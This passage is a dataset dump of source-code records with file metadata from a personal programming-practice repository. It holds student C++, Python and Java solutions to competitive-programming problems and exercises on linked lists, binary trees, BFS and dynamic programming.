main(String[] args) {\n\t\t// TODO Auto-generated method stub\n\t\tScanner sc = new Scanner(System.in);\n\t\tint t;\n\t\tt = sc.nextInt();\n\t\twhile(t--!=0)\n\t\t{\n\t\t\tlong[] array = new long[3];\n\t\t\tlong a, b, c, max;\n\t\t\ta = sc.nextLong();\n\t\t\tb = sc.nextLong();\n\t\t\tc = sc.nextLong();\t\n\t\t\tarray[0] = a;\n\t\t\tarray[1] = b;\n\t\t\tarray[2] = c;\n\t\t\tArrays.sort(array);\n\t\t\tSystem.out.println(array[1]);\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.35729846358299255, "alphanum_fraction": 0.3986928164958954, "avg_line_length": 11.929577827453613, "blob_id": "a6f31574b7ac71494a6edceffe1b949df011f994", "content_id": "e6b5a08c64c9f1ca3053647b970ccc8f4978e034", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 918, "license_type": "permissive", "max_line_length": 74, "num_lines": 71, "path": "/C++/DP/mincost.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint mini(int x, int y, int z)\n{\n\tif(x < y)\n\t{\n\t\treturn (x < z)? x : z;\n\t}\n\telse\n\t{\n\t\treturn (y < z)? 
y : z;\n\t}\n}\n\nint mincost(int a[][3], int m, int n)\n{\n\tint i, j;\n\t\n\tint tc[3][3];\n\t\n\ttc[0][0] = a[0][0];\n\t\n\tfor(i=1;i<=m;i++)\n\t{\n\t\ttc[i][0] = tc[i-1][0] + a[i][0];\n\t}\n\t\n\tfor(j=1;j<=n;j++)\n\t{\n\t\ttc[0][j] = tc[0][j-1] + a[0][j];\n\t}\n\t\n\tfor(i=1;i<=m;i++)\n\t{\n\t\tfor(j=1;j<=n;j++)\n\t\t{\n\t\t\ttc[i][j] = a[i][j] + mini(tc[i-1][j], tc[i][j-1], tc[i-1][j-1]);\n//\t\t\tcout << \"mini = \" << mini(a[i-1][j], a[i][j-1], a[i-1][j-1]) << \"\\n\";\n\t\t}\n\t}\n\t\n//\tcout << \" return \" << tc[m][n];\n\n\tfor(i=0;i<=m;i++)\n\t{\n\t\tfor(j=0;j<=n;j++)\n\t\t{\n\t\t\tcout << tc[i][j] << \"\\t\";\n\t\t}\n\t\tcout << \"\\n\";\n\t}\n\treturn tc[m][n];\n}\n\nint main()\n{\n\tint a[3][3];\n\tint i, j;\n\tfor(i=0;i<3;i++)\n\t{\n\t\tfor(j=0;j<3;j++)\n\t\t{\n\t\t\tcin >> a[i][j];\n\t\t}\n\t}\n//\tcout << \"Done for\";\n\tint ans = mincost(a, 2, 2);\n\tcout << ans;\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.3302919566631317, "alphanum_fraction": 0.36496350169181824, "avg_line_length": 10.680850982666016, "blob_id": "e21b0bc4c9357bb48f7e22a10a98e977d6d7cc49", "content_id": "9380b3b60ad6b21880e93970ba855528b04fd57e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 548, "license_type": "permissive", "max_line_length": 37, "num_lines": 47, "path": "/C++/GMPOW.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tlong t, n ,a;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tlong long sum = 0,i,flag = 1,x,p=0;\n\t\tcin >> a >> n;\n\t\tlong long k = 1;\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tk = k * a; // integer power; pow() works in doubles and can truncate\n\t\t}\n\t\twhile(k > 0)\n\t\t{\n\t\t\tx = k % 10;\n\t\t\tsum += x;\n\t\t\tk = k / 10;\n\t\t}\n\t//\tcout << sum << \"\\n\";\n\t\tif(sum ==1 || sum ==2)\n\t\t{\n\t\t\tcout << 1 << \"\\n\";\n\t\t\tp = 1;\n\t\t}\n\t\tif(p==0)\n\t\t{\n\t\t\tfor(i=2;i<=sqrt(sum);i++)\n\t\t\t{\n\t\t\tif(sum%i == 0)\n\t\t\t{\n\t\t\t\tflag = 0;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\t}\n\t\t\tif(flag == 1)\n\t\t\t{\n\t\t\t\tcout << 1 << \"\\n\";\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tcout << 0 << \"\\n\";\n\t\t\t}\n\t\t}\n\t\t\n\t}\n\t\n}" }, { "alpha_fraction": 0.48880597949028015, "alphanum_fraction": 0.5522388219833374, "avg_line_length": 14.823529243469238, "blob_id": "b12f85bb084c821c61283fb5b9843d03bab8efaf", "content_id": "f5756bbe235dc59fdd1e9133f57b482a089f2d30", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 268, "license_type": "permissive", "max_line_length": 35, "num_lines": 17, "path": "/python/HPOJ/Ex-5/3.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 20 15:17:03 2020\n\n@author: teja\n\"\"\"\n\nn=int(input())\na=[]\nfor i in range(0,n):\n lk,pk=input().split()\n lis=[i+1,int(lk)+int(pk)]\n a.append(lis)\na.sort(key=lambda i:i[1])\nfor i in a:\n print(i[0],end=\" \")\nprint()" }, { "alpha_fraction": 0.5794044733047485, "alphanum_fraction": 0.593052089214325, "avg_line_length": 13.213114738464355, "blob_id": "a2827a0110ad329ea74f2bd2d314b2d6cb4c80f5", "content_id": "c713732533edb95db3323cec43f155f6b0748280", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 806, "license_type": "permissive", "max_line_length": 70, "num_lines": 61, "path": "/C++/nth node in LL.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": 
"//https://www.geeksforgeeks.org/nth-node-from-the-end-of-a-linked-list\n\n#include<bits/stdc++.h>\nusing namespace std;\n\nstruct Node\n{\n\tint data;\n\tstruct Node* next;\n};\n\nvoid printNthfromLast(struct Node* head, int n)\n{\n\tint len = 0, i;\n\tstruct Node* temp = head;\n\t\n\twhile(temp!= NULL)\n\t{\n\t\ttemp = temp->next;\n\t\tlen++;\n\t}\n\t\n\tif(len < n)\n\t{\n\t\treturn;\n\t}\n\ttemp = head;\n\t\n\tfor(i=1;i<len-n+1;i++)\n\t{\n//\t\tcout << temp->data << \" -> \";\n\t\ttemp = temp->next;\n\n\t}\n\tcout << temp->data;\n\treturn;\n\t\n}\n\nvoid push(struct Node** head_ref, int new_data)\n{\n\tstruct Node* new_node = new Node();\n\t\n\tnew_node->data = new_data;\n\tnew_node->next = *head_ref;\n\t*head_ref = new_node;\n}\n\n\n\nint main()\n{\n\tstruct Node* head = NULL;\n\t\n\tpush(&head, 20);\n\tpush(&head, 4);\n\tpush(&head, 15);\n\tpush(&head, 35);\n\t\n\tprintNthfromLast(head, 4);\n}\n" }, { "alpha_fraction": 0.33960995078086853, "alphanum_fraction": 0.373907208442688, "avg_line_length": 13.722772598266602, "blob_id": "8ea4081fabcb79c50220309073f22941ffbf53b6", "content_id": "8737f597a59396dbaee0e3bcba92977f36352a68", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1487, "license_type": "permissive", "max_line_length": 83, "num_lines": 101, "path": "/April Long_2020/Unit GCD - version 1.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nvoid prime(int n, vector<int> &check, vector<vector<int>> & ans, vector<int> &rest)\n{\n\tans[0].push_back(1);\n\tint i, j;\n\tcheck[0] = 0;\n\tcheck[1] = 0;\n\tfor(i=2;i<=n;i++)\n\t{\n\t\tif(check[i] != 0)\n\t\t{\n\t\t\tfor(j=2; i*j <= n;j++)\n\t\t\t{\n\t\t\t\tcheck[i*j] = 0;\n\t\t\t}\t\n\t\t}\n\t}\n\t\n\tfor(i=1;i<=n;i++)\n\t{\n\t\tif(check[i] == 1)\n\t\t{\n//\t\t\tcout << i << \" \";\n\t\t\trest[i] = 0;\n\t\t\tans[0].push_back(i);\n\t\t}\n\t}\n//\tcout << \"\\n\";\n}\n\nint main()\n{\n\tint t, n ,i ,j;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tcin >> n;\n\t\tvector<int> check(n+1, 1);\n\t\tvector<int> rest(n+1, 1);\n\t\trest[0] = 0;\n\t\trest[1] = 0;\n\t\tvector<vector<int>> ans(10000000);\n\t\tprime(n, check, ans, rest);\n\t\t\n\t\tint k = 1, p, days = 1;\n\t\tfor(i=2;i<=n;i++)\n\t\t{\n//\t\t\tk = 1;\n\t\t\tk = k % days;\n\t\t\tif(check[i] == 1)\n\t\t\t{\n\t\t\t\tfor(j=2; i*j<=n; j++)\n\t\t\t\t{\t\t\t\t\t\n\t\t\t\t\tif(rest[i*j] == 1)\n\t\t\t\t\t{\n\t\t\t\t\t\tfor(p = 0; p<ans[k].size();p++)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tif(ans[k][p] % i == 0)\n\t\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\t++k;\n//\t\t\t\t\t\t\t\tbreak;\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t\t\n\t\t\t\t\t\tif(i == 2)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t++days;\t\n\t\t\t\t\t\t}\n\t\t\t\t\t\tans[k].push_back(i*j);\n//\t\t\t\t\t\tcout << i*j << \" \";\n\t\t\t\t\t\trest[i*j] = 0;\n\t\t\t\t\t\t++k;\t\n\t\t\t\t\t}\t\t\n\t\t\t\t}\n//\t\t\t\tcout << \"\\n\";\n\t\t\t}\n\t\n\t\t}\t\n\t\t\n\t\tint siz = ans.size();\n//\t\tcout << \"siz = \" << siz << \"\\n\";\n\t\t\n//\t\tcout << \"\\n\\n\\n\";\n\t\tcout << days << \"\\n\";\n\t\tfor(i=0;i<1000001;i++)\n\t\t{\n\t\t\tif(ans[i].size() == 0)\n\t\t\t{\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\tcout << ans[i].size() << \" \";\n\t\t\tfor(j=0;j<ans[i].size();j++)\n\t\t\t{\n\t\t\t\tcout << ans[i][j] << \" \";\n\t\t\t}\n\t\t\tcout << \"\\n\";\n\t\t}\n\t}\t\n}\n" }, { "alpha_fraction": 0.475382000207901, "alphanum_fraction": 0.4855687618255615, "avg_line_length": 13.13599967956543, "blob_id": "b4421cb6fc5b53d8ecbe8f3233d60a93dd510b06", 
"content_id": "3666a4ea98d6daae42c8f15bac80ae23e0bd03cb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1767, "license_type": "permissive", "max_line_length": 54, "num_lines": 125, "path": "/C++/Linkedlist/Findling loop in LL.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nclass Node\n{\n\tpublic:\n\t\tint data;\n\t\tNode* next;\n\t\tNode(int data)\n\t\t{\n\t\t\tthis->data = data;\n\t\t\tnext = NULL;\n\t\t}\t\n};\n\nclass Linkedlist\n{\n\tpublic:\n\t\tNode* head;\n\t\tNode* tail;\n\t\tint len;\n\t\tLinkedlist()\n\t\t{\n\t\t\thead = NULL;\n\t\t\ttail = NULL;\n\t\t\tlen = 0;\n\t\t}\n\t\t\n\t\tvoid append(int data)\n\t\t{\n\t\t\tNode* new_node = new Node(data);\n\t\t\tif(len == 0)\n\t\t\t{\n\t\t\t\thead = new_node;\n\t\t\t\ttail = new_node;\n\t\t\t\tnew_node->next = NULL;\n\t\t\t\t++len;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\ttail->next = new_node;\n\t\t\t\ttail = new_node;\n\t\t\t\ttail->next = NULL;\n\t\t\t\t++len;\n\t\t\t}\n\t\t}\n\t\t\n\t\tvoid cycle(int n)\n\t\t{\n\t\t\tNode* temphead = head;\n\t\t\tNode* temptail = tail;\n\t\t\tint i = 0;\n\t\t\tfor(i=0;i<len-n;i++)\n\t\t\t{\n\t\t\t\ttemphead = temphead->next;\n\t\t\t}\n\t\t\tcout << \"cycle meet \" << temphead->data << \"\\n\";\n\t\t\ttail->next = temphead;\n\t\t}\n\t\t\n\t\tvoid printlist()\n\t\t{\n\t\t\tint val = 0;\n\t\t\tNode* temp = head;\n\t\t\twhile(temp->next != NULL)\n\t\t\t{\n\t\t\t\tif(val < 9)\n\t\t\t\t{\n\t\t\t\t\tcout << temp->data << \" -> \";\n\t\t\t\t\ttemp = temp->next;\t\n\t\t\t\t\t++val;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\treturn ;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t\n\t\tvoid hareTortoise()\n\t\t{\n\t\t\tNode* hare = head;\n\t\t\tNode* tort = head;\n\t\t\tif(hare->next != NULL)\n\t\t\t{\n\t\t\t\thare = hare->next->next;\n\t\t\t\ttort = tort->next;\n\t\t\t}\n\t\t\tint flag = 0;\n\t\t\twhile(hare != tort)\n\t\t\t{\n\t\t\t\tif(hare->next != NULL && hare->next->next != NULL)\n\t\t\t\t{\n\t\t\t\t\thare = hare->next->next;\n\t\t\t\t\ttort = tort->next;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tcout << \"No cycle!\" << \"\\n\";\n\t\t\t\t\tflag = 1;\n\t\t\t\t\treturn;\n\t\t\t\t}\n\t\t\t} \n\t\t\tif(flag == 0){\n\t\t\t\tcout << \"Loop exists\";\n\t\t\t}\n\t\t}\n};\n\nint main()\n{\n\tLinkedlist* ll = new Linkedlist();\n\tll->append(2);\n\tll->append(3);\n\tll->append(4);\n\tll->append(5);\n\tll->append(6);\n\tll->append(7);\n\tll->append(8);\n\tll->append(9);\n\t\n//\tll->cycle(4);\n\tll->printlist();\n\tll->hareTortoise();\n}\n" }, { "alpha_fraction": 0.44517338275909424, "alphanum_fraction": 0.4695407748222351, "avg_line_length": 19.269229888916016, "blob_id": "7eb13a047dc0a4c92faf40ff55fa82220d9d439d", "content_id": "d8cbe694f9fffa38710ca354150d0ae8d5ec37bb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1067, "license_type": "permissive", "max_line_length": 42, "num_lines": 52, "path": "/openlab_coding_preperation/optimized_LL.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 2 17:25:17 2020\n\n@author: teja\n\"\"\"\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n \nclass LinkedList:\n \n def __init__(self, data):\n self.head = Node(data)\n \n def attachNode(self, data):\n node = Node(data)\n node.next = self.head\n self.head = node\n \n def attachBack(self, data):\n node = Node(data)\n temp = 
self.head\n while(temp.next!=None):\n temp = temp.next\n temp.next = node\n \n \n def printLL(self):\n temp = self.head\n while(temp):\n print(temp.data, end = \" -> \")\n temp = temp.next\n\nif __name__ == '__main__':\n l = [1, 2, 3, 4, 5]\n llist = LinkedList(l[0])\n for i in range(1, len(l)):\n llist.attachNode(l[i])\n \n llist.printLL()\n \n print()\n \n l = [1, 2, 3, 4, 5]\n llist = LinkedList(l[0])\n for i in range(1, len(l)):\n llist.attachBack(l[i])\n \n llist.printLL()\n \n " }, { "alpha_fraction": 0.5695364475250244, "alphanum_fraction": 0.5854304432868958, "avg_line_length": 14.729166984558105, "blob_id": "1896f26333ce1110f7df86578f662c6a451512b5", "content_id": "144206237ff4c656f7c5db06f334bf60066741f6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 755, "license_type": "permissive", "max_line_length": 58, "num_lines": 48, "path": "/C++/yartin.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<iostream>\n#include<cmath>\nusing namespace std;\nstruct bst{\n\tint data;\n\tbst *left;\n\tbst *right;\n};\nbst* insert(bst *root, int x){\n\t\tif(root==0){\n\t\tbst *root=new bst();\n\t\troot->data=x;\n\t\troot->left=root->right=0;\n\t\treturn root;\n\t}\n\tif(x<=root->data)\n\t\troot->left=insert(root->left,x);\n\telse if(x>root->data)\n\t\troot->right=insert(root->right,x);\n\treturn root;\n}\n\nint max_kill(bst *root){\n\tif(root==0)\n\t\treturn -1;\n\treturn max(max_kill(root->left),max_kill(root->right))+1;\n}\nint main(){\n\tint t,n,x;\n\tcin>>t;\n\tfor(int j=1; j<=t; j++){\n\t\tcin>>n;\n\t\tbst *root=0;\n\t\tfor(int i=1; i<=n; i++)\n\t\t{\n\t\t\tcin>>x;\n\t\t\troot=insert(root,x);\n\t\t}\n\t\t\t\t\n\t\tint result=max_kill(root)+1;\n\t\tif(result==-1)\n\t\t\tcout<<\"0\";\n\t\telse\n\t\t\tcout<<result;\n\t\tcout<<endl;\n\t}\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.45890411734580994, "alphanum_fraction": 0.4771689474582672, "avg_line_length": 18.46666717529297, "blob_id": "458c4727ab78632ad5384559d5c9dec44f06229c", "content_id": "3fd662448f00aab0ac10ab9e9fd15a42a89fd271", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 876, "license_type": "permissive", "max_line_length": 60, "num_lines": 45, "path": "/python/HPOJ/BST.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 6 11:46:41 2020\n\n@author: teja\n\"\"\"\n\nclass Node:\n def __init__(self, key):\n self.left = None\n self.right = None\n self.val = key\n \ndef insert(root, node):\n if root is None:\n root = node\n else:\n if root.val > node.val:\n if root.left == None:\n root.left = node\n \n else:\n insert(root.left, node)\n else:\n if root.right == None:\n root.right = node\n \n else:\n insert(root.right, node)\n\n\ndef height(node):\n if node == None:\n return 0\n else:\n return 1 + max(height(node.left), height(node.right))\n\n\nn = int(input())\nl = list(map(int,input().split()))\nr = Node(int(l[0]))\nfor i in range(1, n):\n insert(r, Node(int(l[i])))\n\nprint(height(r))\n" }, { "alpha_fraction": 0.3612637221813202, "alphanum_fraction": 0.3811813294887543, "avg_line_length": 17.653846740722656, "blob_id": "4c0f6c61bf08308799973a7db61380e22f03910d", "content_id": "d6af85b36c5135fffbf31e6cef94f403059c66b4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1456, "license_type": "permissive", "max_line_length": 81, "num_lines": 78, 
"path": "/C++/Laser_Everywhere.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nstruct Test\n{\n\tint x, y, z;\n};\n\nint main()\n{\n\tint t, n, m;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tcin >> n >> m;\n\t\tint i;\n\t\tvector < int > pts(n+1);\n\t\tfor(i=1;i<=n;i++)\n\t\t{\n\t\t\tcin >> pts[i];\n\t\t}\n\t\t\n\t\tvector< Test > coord(n);\n\t\tint a, b, c;\n\t\tfor(i=1;i<n;i++)\n\t\t{\n\t\t\ta = pts[i+1] - pts[i];\n\t\t\tb = i - i - 1;\n\t\t\tc = -1 * (a * i + b * pts[i]);\n\t\t\tcoord[i] = {a, b, c};\n\t\t}\n//\t\tfor(i=1;i<n;i++)\n//\t\t{\n//\t\t\tcout << coord[i].x << \" \" << coord[i].y << \" \" << coord[i].z << \"\\n\";\n//\t\t}\n\t\t\n\t\tint count = 0, x1, x2, y;\n\t\tfloat poix, poiy;\n\t\twhile(m--)\n\t\t{\n\t\t\tunordered_map <int, int>map;\n\t\t\tint ans = 0;\n\t\t\tcount = 0;\n\t\t\tcin >> x1 >> x2 >> y;\n\t\t\tfor(i=1;i<n;i++)\n\t\t\t{\n\t\t\t\ta = 0;\n\t\t\t\tb = x1 - x2;\n\t\t\t\tc = -1 * (a * x1 + b * y);\n\t\t\t\t\n\t\t\t\tpoix = (coord[i].y * c - b * coord[i].z) / (coord[i].x * b - a * coord[i].y);\n\t\t\t\tpoiy = (coord[i].z * a - c * coord[i].x) / (coord[i].x * b - a * coord[i].y);\n\t\t\t\tcout << fixed << setprecision(5) << \"poix = \" << poix << \"\\n\";\n\t\t\t\tcout << fixed << setprecision(5) << \"poiy = \" << poiy << \"\\n\";\n\n\t\t\t\tif((poix >= i && poix <= i+1) || (poiy >= pts[i] && poiy <= pts[i+1]))\n\t\t\t\t{\n\t\t\t\t\tif((x2 == i && y == pts[i]) || (x1 == i+1 && y == pts[i+1]))\n\t\t\t\t\t{\n\t\t\t\t\t\tcontinue;\n\t\t\t\t\t}\n\t\t\t\t\tif(map[poix] == 0)\n\t\t\t\t\t{\n\t\t\t\t\t\tmap[poix] = poiy;\n//\t\t\t\t\t\tcout << \"POI = (\" << poix << \", \" << poiy << \")\\n\"; \n\t\t\t\t\t\t++ans;\n\t\t\t\t\t}\n\t\t\t\t\telse\n\t\t\t\t\t{\n\t\t\t\t\t\tcontinue;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\tcout << ans << \"\\n\";\n\t\t}\n\t}\n\n}\n\n" }, { "alpha_fraction": 0.4330900311470032, "alphanum_fraction": 0.4476885497570038, "avg_line_length": 10.771428108215332, "blob_id": "10e8087c4fd519ffd4d220ae5fa2d50932da51b3", "content_id": "735436ea79ca3b642860eedb2beeb20a3fe09c59", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 411, "license_type": "permissive", "max_line_length": 30, "num_lines": 35, "path": "/C++/CHNUM.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\nint main()\n{\n\tint t,n,i;\n\tcin >> t;\n\twhile(t--)\n\t{\n\tcin >> n;\n\tvector< long long > arr(n);\n\tlong long pos = 0 , neg = 0;\n\tfor(i=0; i<n ;i++)\n\t{\n\t\tcin >> arr[i];\n\t\tif(arr[i] > 0)\n\t\t{\n\t\t\t++pos;\n\t\t}\n\t\telse\n\t\t{\n\t\t\t++neg;\n\t\t}\n\t}\n\tcout << max(pos, neg) << \" \";\n\tif(pos==0 || neg == 0)\n\t{\n\t\tcout << max(pos, neg);\n\t}\n\telse\n\t{\n\t\tcout << min(pos, neg);\n\t}\n\tcout << \"\\n\";\n\t}\n}" }, { "alpha_fraction": 0.44262295961380005, "alphanum_fraction": 0.4601873457431793, "avg_line_length": 21.473684310913086, "blob_id": "d592f1e6da5789db143cc3a37fd2a73b1a59768c", "content_id": "130ccd34ea72a26ae97afd86ed75f4e307a84709", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 854, "license_type": "permissive", "max_line_length": 55, "num_lines": 38, "path": "/openlab_coding_preperation/Construct_BinaryTree_from_LevelOrderList.py", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script 
file.\n\"\"\"\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n \ndef insertLevelOrder(arr, root, i, n): \n \n if i < n: \n temp = Node(arr[i]) \n root = temp \n \n root.left = insertLevelOrder(arr, root.left, \n 2 * i + 1, n) \n \n root.right = insertLevelOrder(arr, root.right, \n 2 * i + 2, n) \n return root \n\ndef inOrder(root): \n if root != None: \n inOrder(root.left) \n print(root.data,end=\" \") \n inOrder(root.right) \n\nif __name__ == '__main__':\n l = [1, 2, 3, 4, 5, 6, 6, 6, 6]\n n = len(l)\n root = None\n root = insertLevelOrder(l, root, 0, n) \n inOrder(root)\n" }, { "alpha_fraction": 0.40512821078300476, "alphanum_fraction": 0.4205128252506256, "avg_line_length": 17.25, "blob_id": "db498f7eccb9cf475403b0855fa1b389433bb11f", "content_id": "04b344ee777f32e436df9851383db5f7db12ca58", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 585, "license_type": "permissive", "max_line_length": 67, "num_lines": 32, "path": "/Java/EID.java", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "\nimport java.util.*;\nclass Codechef\n{\n\tpublic static void main (String[] args) throws java.lang.Exception\n\t{\n\t\tint t,min,n,i,sum = 0;\n\t\tScanner sc = new Scanner(System.in);\n\t\tt = sc.nextInt();\n\t\twhile(t--!=0)\n\t\t{\n\t \t \n\t\t n = sc.nextInt();\n\t\t int[] a = new int[n];\n\t for(i=0;i<n;i++)\n\t \t{\n\t\t a[i] = sc.nextInt();\n\t\t sum+=a[i];\n\t\t }\n\t \tArrays.sort(a);\n\t\t\tmin = (a[1]-a[0]);\n\t\t for(i=1;i<=n-2;i++)\n\t {\n\t\t if(min > (a[i+1]-a[i]))\n\t\t {\n\t\t min = (a[i+1]-a[i]);\n\t\t }\n\t }\n\t System.out.println(min);\n\t }\n\t \n\t}\n}\n" }, { "alpha_fraction": 0.3424878716468811, "alphanum_fraction": 0.368336021900177, "avg_line_length": 11.117647171020508, "blob_id": "95ff96834d2ee16851a65284d2985c4a6584a11f", "content_id": "556ae2bc78484c897d80e390e123b1d1fd8c2475", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 619, "license_type": "permissive", "max_line_length": 36, "num_lines": 51, "path": "/April Long_2020/COVID Pandemic and Long Queue.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tint t, n, i;\n\tcin >> t;\n\twhile(t--)\n\t{\n\t\tint count = 0, flag = 0;\n\t\tcin >> n;\n\t\tint temp = 0, y = 0;\n\t\tvector< int >vec(n);\n\t\tfor(i=0;i<n;i++)\n\t\t{\n\t\t\tcin >> vec[i];\n\t\t}\n\t\tfor(i=0;i<n;i++)\n\t\t{\n//\t\t\tcin >> temp;\n\t\t\tif(flag == 0 && vec[i] == 1)\n\t\t\t{\n\t\t\t\tflag = 1;\n\t\t\t}\n\t\t\telse if(flag == 1 && vec[i] == 1)\n\t\t\t{\n\t\t\t\tif(count < 5)\n\t\t\t\t{\n\t\t\t\t\ty = 1;\n\t\t\t\t\tbreak;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tcount = 0;\n\t\t\t\t}\n\t\t\t}\n\t\t\telse if(flag == 1 && vec[i] == 0)\n\t\t\t{\n\t\t\t\t++count;\n\t\t\t}\n\t\t}\t\t\n\t\tif(y)\n\t\t{\n\t\t\tcout << \"NO\" << \"\\n\";\n\t\t}\n\t\telse\n\t\t{\n\t\t\tcout << \"YES\" << \"\\n\";\n\t\t}\n\t}\n}\n\n" }, { "alpha_fraction": 0.5784313678741455, "alphanum_fraction": 0.5882353186607361, "avg_line_length": 11.75, "blob_id": "694ca38140be2098e3eea09801a177da9d4f3eae", "content_id": "65625bfcc11ae6cbe546dbadc3ba5c93646f93e2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 102, "license_type": "permissive", "max_line_length": 23, "num_lines": 8, "path": "/C++/pointer.cpp", "repo_name": 
"Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nint main()\n{\n\tchar *con = \"Geeks\";\n\tcout << *(con+1);\n}\n" }, { "alpha_fraction": 0.518193244934082, "alphanum_fraction": 0.5232120156288147, "avg_line_length": 10.880597114562988, "blob_id": "d1ec3fdaac6525174263d359bce46f9138858611", "content_id": "6218f6ff9522c5e454c849779f90f513975705a7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 797, "license_type": "permissive", "max_line_length": 55, "num_lines": 67, "path": "/C++/tree/BFS.cpp", "repo_name": "Teja-09/Programming", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\nusing namespace std;\n\nclass node\n{\n\tpublic:\n\t\tint data;\n\t\tnode* left;\n\t\tnode* right;\n\t\tnode(int data)\n\t\t{\n\t\t\tthis->data = data;\n\t\t\tleft = NULL;\n\t\t\tright = NULL;\n\t\t}\n};\n\nnode* newnode(int data)\n{\n\tnode* newnode = new node(data);\n\treturn newnode;\n}\n\nvoid BFS(node* root)\n{\n\tif(root == NULL)\n\t{\n\t\tcout << 0;\n\t}\n\t\n\tqueue<node*>q;\n\tq.push(root);\n\t\n\twhile(!q.empty())\n\t{\n\t\tint siz = q.size();\n\t\t\n//\t\twhile(siz--) This runs with or without while loop\t\n//\t\t{\n\t\t\tnode* val = q.front();\n\t\t\tq.pop();\n\t\t\t\n\t\t\tcout << val->data << \" \";\n\t\t\tif(val->left != NULL)\n\t\t\t{\n\t\t\t\tq.push(val->left);\n\t\t\t}\n\t\t\t\n\t\t\tif(val->right != NULL)\n\t\t\t{\n\t\t\t\tq.push(val->right);\n\t\t\t}\n\t\t\t\n//\t\t}\n\t}\n\t\n\t\n}\n\nint main()\n{\n\tnode* root = newnode(3);\n\troot->left = newnode(2);\n\troot->right = newnode(1);\n\tBFS(root);\n\n}\n\n" }, { "alpha_fraction": 0.5131579041481018, "alphanum_fraction": 0.5394737124443054, "avg_line_length": 14.199999809265137, "blob_id": "610edaf338db597c8d950fb8f888108bff8496be", "content_id": "2786407ff6a839bf7a4a3e0e2280d86e39e725e4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 304, "license_type": "permissive", "max_line_length": 41, "num_lines": 20, "path": "/Java/HS08TEST.java", "repo_name": 